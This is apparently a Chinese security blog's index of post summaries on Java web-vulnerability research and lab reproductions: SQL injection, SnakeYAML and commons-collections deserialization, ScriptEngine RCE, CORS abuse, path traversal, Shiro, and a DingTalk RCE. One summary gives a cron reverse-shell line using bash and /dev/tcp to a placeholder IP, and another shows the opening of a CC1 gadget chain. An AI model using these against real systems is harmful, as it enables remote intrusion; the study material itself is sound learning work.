摘要:
感谢龙哥帮我写好的项目。 基于Springboot框架 ,使用mybatis来连接本地mysql数据库 进来配置好数据库名称 用户和密码 然后连接上数据库 这里用的语句是预编译的,之前说过order by这后面使用预编译是会报错的 select * from users where username 阅读全文
摘要:
0x01环境搭建 首先在maven项目的pom文件下导入yaml的依赖 这里是1.27版本的,这里的jdk我用的是11,用1.8的没成功会抛异常 来跟着写一个实例来了解一下yaml 先写一个testSnake类 然后用yaml将该类实例对象给序列化,这里用的是dump()方法 输出结果: !!意思是 阅读全文
摘要:
jscmd rce 了解一下 ScriptEngineManager:是一个工厂的集合,可以通过name或者tag的方式获取某一个脚本的工厂,并且生成一个脚本的ScriptEngine. ScriptEngine engine=new ScriptEngineManager().getEngineB 阅读全文
摘要:
有一直在写cors漏洞,但是一直没有去真正的利用他,今天就来学习记录一下利用。 0x01前置知识 就简单提一下 Access-Control-Allow-Origin: 可以写出哪些域名能访问本站的资源 Access-Control-Allow-Credentials:字段不是必选字段,它的值是一个 阅读全文
摘要:
反弹shell 格式问题 在写计划任务反弹shell的时候VPS如果是centos那么直接写 */1 * * * * root bash -i >& /dev/tcp/IP/666 0>&1 但是在实际测试中debian和ubuntu系统这样写是执行不了的, 需要加上 bash -c " " */1 阅读全文
摘要:
前几天爆出来钉钉RCE的漏洞,说一下发现和复现过程 0x01 爱之初体验 最开始是发现可以ssrf,当时电脑上就有dingding 然后试了一下 dnslog有回显,可以去访问 这两个IP一查 都是阿里云的服务器 payload是这样的,发送到聊天窗口,服务器就会去解析 dingtalk://din 阅读全文
摘要:
任意文件读取 漏洞url在: http://localhost:7869/path_traversal/vul?filepath=e:/flag.txt 可以直接访问到flag文件 来看看vul此处的代码 这里是调用getImgBase64方法 跟进这个方法 可以看到仅仅判断了改路径是否存在和不是目 阅读全文
摘要:
先来看看这个靶场sql注入的位置 简单的一个闭合单引号就能探测出了注入 那么来看看源码 可以看到jdbc_sqli_vul函数直接传入的username就拼接到了sql中,然后取执行返回信息,没有做任何防护。 jdbc_sqli_sec 再来看看安全的查询函数 这里用到了PreparedStatem 阅读全文
摘要:
在cc1链中的poc有着这样一段 Transformer[] transformers = new Transformer[] { //通过ConstantTransformer类的transform方法获取一个对象类型 new ConstantTransformer(Runtime.class), 阅读全文
摘要:
0x01 漏洞环境 搭建环境: docker pull medicean/vulapps:s_shiro_1 重启docker systemctl restart docker docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1 shiro框架 阅读全文